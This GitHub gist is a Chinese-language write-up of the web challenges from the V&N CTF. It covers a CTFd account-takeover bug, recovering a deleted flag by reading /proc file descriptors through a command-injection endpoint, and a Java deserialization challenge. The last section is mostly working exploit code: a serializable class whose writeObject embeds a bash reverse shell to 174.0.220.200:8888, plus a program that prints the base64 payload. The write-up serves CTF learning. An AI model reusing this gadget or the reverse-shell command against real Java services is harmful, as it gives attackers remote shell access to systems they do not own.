Created
March 1, 2020 11:36
-
-
Save kaiili/45cf1bf49e1d11cc881470e5ef6f1c37 to your computer and use it in GitHub Desktop.
v&n ctf web部分wp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# web 1 | |
一个简单的漏洞利用题,知道 ctfd的账号接管的洞就能做。 | |
# web 2 | |
伪代码如下 | |
``` | |
open("flag.txt","r") | |
def shell(): | |
os.system("rm flag.txt") | |
os.system(request.form["c"]) | |
``` | |
这是一个查文档 / 考验基础的题。我是查看文档得到的提示。 | |
python 在 open 的时候会保存文件具柄(fd), | |
而在 linux 内核下 文件具柄也是特殊的文件, | |
所以 | |
``` | |
cat /proc/*/fd/* | |
``` | |
### web3 | |
一个超级简单的 java反序列化的题。 | |
如果类比成 PHP,大概是这样 | |
``` | |
class Tools{ | |
public function __destruct() | |
{ | |
system($this->data); | |
} | |
} | |
``` | |
我的exp | |
``` | |
package com.tools; | |
import java.io.ByteArrayInputStream; | |
import java.io.ByteArrayOutputStream; | |
import java.io.IOException; | |
import java.io.ObjectInputStream; | |
import java.io.ObjectOutputStream; | |
import java.io.Serializable; | |
public class Tools implements Serializable { | |
private static final long serialVersionUID = 1L; | |
private String testCall; | |
public static Object parse(byte[] bytes) throws Exception { | |
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes)); | |
return ois.readObject(); | |
} | |
public static byte[] create(Object obj) throws Exception { | |
ByteArrayOutputStream bos = new ByteArrayOutputStream(); | |
ObjectOutputStream outputStream = new ObjectOutputStream(bos); | |
outputStream.writeObject(obj); | |
return bos.toByteArray(); | |
} | |
private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException { | |
Object obj = s.readObject(); | |
(new ProcessBuilder((String[])obj)).start(); | |
} | |
private void writeObject(java.io.ObjectOutputStream s) throws IOException { | |
String [] cmd = new String[]{"/bin/bash","-c"," bash -i >& /dev/tcp/174.0.220.200/8888 0>&1 "}; | |
s.writeObject(cmd); | |
} | |
} | |
``` | |
``` | |
package com; | |
import com.tools.Tools; | |
import com.tools.ClientInfo; | |
import java.io.*; | |
import java.util.*; | |
import com.tools.Person; | |
public class m { | |
public static void main(String[] args) throws Exception { | |
com.tools.Tools t = new com.tools.Tools(); | |
ObjectOutputStream oos = null; | |
ByteArrayOutputStream baos = null; | |
// 序列化 | |
baos = new ByteArrayOutputStream(); | |
oos = new ObjectOutputStream(baos); | |
oos.writeObject(t); | |
byte[] bytes = baos.toByteArray(); | |
Base64.Encoder encoder = Base64.getEncoder(); | |
System.out.println(encoder.encodeToString(bytes)); | |
} | |
} | |
``` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment